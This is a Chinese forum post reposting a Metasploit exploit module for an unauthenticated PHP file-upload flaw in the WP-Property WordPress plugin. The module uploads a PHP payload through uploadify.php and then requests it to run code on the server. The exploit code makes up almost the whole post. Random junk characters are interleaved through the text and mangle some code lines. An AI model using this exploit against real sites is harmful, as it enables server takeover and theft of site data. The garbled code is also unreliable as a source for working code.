WordPress WP-Property PHP 文件上传漏洞/ x6 u8 S+ o" x2 ?9 O
9 a6 b' K4 a( d- k ## # This file is part of the Metasploit Framework and may be subject to
, Y0 X) ]: R' x: D! L' K( L. R/ D" A/ K: {# U2 `
# redistribution and commercial restrictions. Please see the Metasploit- `0 w; l# j5 {& `1 S
# N, v0 ?+ r- U4 L# Framework web site for more information on licensing and terms of use.! ]$ ?- d! ^# H' Q1 j
( _' V4 ~6 _6 C5 e4 S( E$ C* ?+ l
# http://metasploit.com/framework/ ##
" ], ^7 H3 o4 H' b* s! f$ M) N+ Z$ V8 X: b# c) j
7 s5 p" a; r0 a# y0 l/ Q' T, e, ~0 j& | z/ J6 d
% m) W, h2 k. a" d# |% Q$ @4 j5 T
8 F* N+ `0 c+ jrequire 'msf/core') o7 d$ `( y |5 r) i4 O2 z
require 'msf/core/exploit/php_exe'
2 J1 O3 D% s! Y% [3 S+ ^) ^6 }% X/ f7 e$ E
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability'," c/ B/ @* T# x7 T. A2 l$ p
'Description' => %q{
1 b) p8 t! Y' Y0 CThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
9 o2 d$ `/ i2 t[! _4 g4 D) z) R8 Y2 f( [
'Sammy FORGIT', # initial discovery7 Q$ V; E3 M1 [
'James Fitts <fitts.james[at]gmail.com>' # metasploit module2 P3 ~/ u4 r5 Q R ?, r+ D
],8 W& g$ K, l% z! [. |) p
'License' => MSF_LICENSE,
8 w7 w) M" z# h0 X'References' =>9 H* w. V) S7 p& r% l& _
[
0 u5 | m/ D6 O( L[ 'OSVDB', '82656' ],
3 x7 s f) }$ [2 l( d7 j( H. C, s; j6 r1 e[ 'BID', '53787' ],
5 _4 f) M- C0 |3 L3 ~# N0 j[ 'EDB', '18987'],
+ K- } V* u; Q$ V* q[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ], E% C: i9 P# G m6 S
],
* A! J N8 ?8 v2 p) G& p: {'Payload' =>5 w; |% l; I, E+ N) d2 G
{
* z" P0 a7 z9 Z/ b'BadChars' => "\x00",3 g$ p/ H4 G, |
},
) v5 @5 I7 T9 ?5 |+ t'Platform' => 'php',
. P% `( s' ^5 M0 ? y" M8 _'Arch' => ARCH_PHP,! v9 t6 x; F" _" a: c
'Targets' =>9 y3 X' o8 p' t# N
[9 s1 o* Z8 B' S- J* {" S& H R
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],: p5 V6 a2 p; Q2 b# S0 Y
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 M9 H0 u/ K! I, z# w( A],
5 Y" L! P, |' C' {6 D4 T'DefaultTarget' => 0,. I; `) S: f6 ^, p% J/ t4 p
'DisclosureDate' => 'Mar 26 2012'))4 e+ } L% Z. x5 E- X7 O+ [# C
' Z0 f( Z0 g; ] sregister_options(* |1 g8 C* j8 `
[$ t2 Q' t# R" D$ J
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
* W3 S: W+ P7 I! Z2 U3 ^6 w], self.class)+ |9 q& L! v( T+ l8 D
end
* H3 a+ x6 n0 `0 x# e/ J! [7 A
def check' ^6 ~/ [7 m8 l. R
uri = target_uri.path7 N' h$ Y2 b. F) c% N/ W
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',' f3 }! L/ h7 G
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"% I# }" e( L* U D. f1 Y
})
% o$ Q5 R) D6 p7 ?0 F+ h$ W
9 P8 {/ i1 `( m C# Yif not res or res.code != 200/ J+ K5 H1 \5 [- K4 T
return Exploit::CheckCode::Unknown( H% Z& T* E6 w* _
end
' h# z& ^8 V3 P- u, U
w9 n$ k. [0 K; Zreturn Exploit::CheckCode::Appears
/ U3 E0 i9 n; }4 `# Z7 mend
( M3 L: X* `! Y8 V. ?/ R8 q0 q! v! v2 m# ?" P3 K' v
def exploit
( L. G0 W% z, v( j4 l: turi = target_uri.path
2 p1 T) z: |! D( l1 buri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
/ W& |+ o4 g4 u7 {: u6 O% M2 b" p6 n0 j+ D
data = Rex::MIME::Message.new
0 e3 T9 L* q* } b5 ?$ O; ?, Jdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")$ v# ~! m) Y' D# N* A
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
. S0 C' w# }6 s) s* ipost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
0 d$ O/ f; |. Z
6 v4 S X9 m+ X ]: I) M ?print_status("#{peer} - Uploading payload #{@payload_name}")
/ g$ c1 P7 }. ]res = send_request_cgi({
7 i* y& y N( e# m7 H4 U7 a2 y'method' => 'POST',
; ^& K/ ^2 v- X3 Y'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
% K, ~/ K: [3 L# z'ctype' => "multipart/form-data; boundary=#{data.bound}",0 G% I3 ?: X# N4 v+ W: I/ ^
'data' => post_data @7 C* R" T) R( c5 ?- j' F$ K
}). V2 h% Z3 [3 n! u5 b" c
6 J% Q0 L, n8 {$ @, Y( Mif not res or res.code != 200 or res.body !~ /#{@payload_name}/2 U& B( p. n: O0 K, i2 [) |
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")0 g$ a0 R6 |* @* c/ @0 T
end7 e8 o( N( T. ]
& r6 v5 P4 A9 Y3 I. C
upload_uri = res.body
. [* g+ Z7 H; v8 R" W" l9 U$ |- a, ~
4 q& n6 z5 r, A( |( |7 f; y9 `print_status("#{peer} - Executing payload #{@payload_name}"); v3 M6 F% n) c' T/ m
res = send_request_raw({) ~8 k( t& ?1 \1 Y% U
'uri' => upload_uri,
$ b# A4 _* u0 k7 N3 q a6 ~'method' => 'GET', S* J2 l% ?& q: j
})2 R. j9 K' w) A0 F. f& w
end
8 s6 b0 ?0 t; q" t+ hend& w$ G) \0 N# \9 m: P; r% O0 U
0 P* [9 i/ c. @, a9 c不要问我这写的是什么 怎么利用 我是说msf.
: x0 V% f+ ^+ o4 z# [3 K
7 A7 ~6 t8 N/ |, w |
发表于 2013-1-4 19:51:30
收藏
支持
反对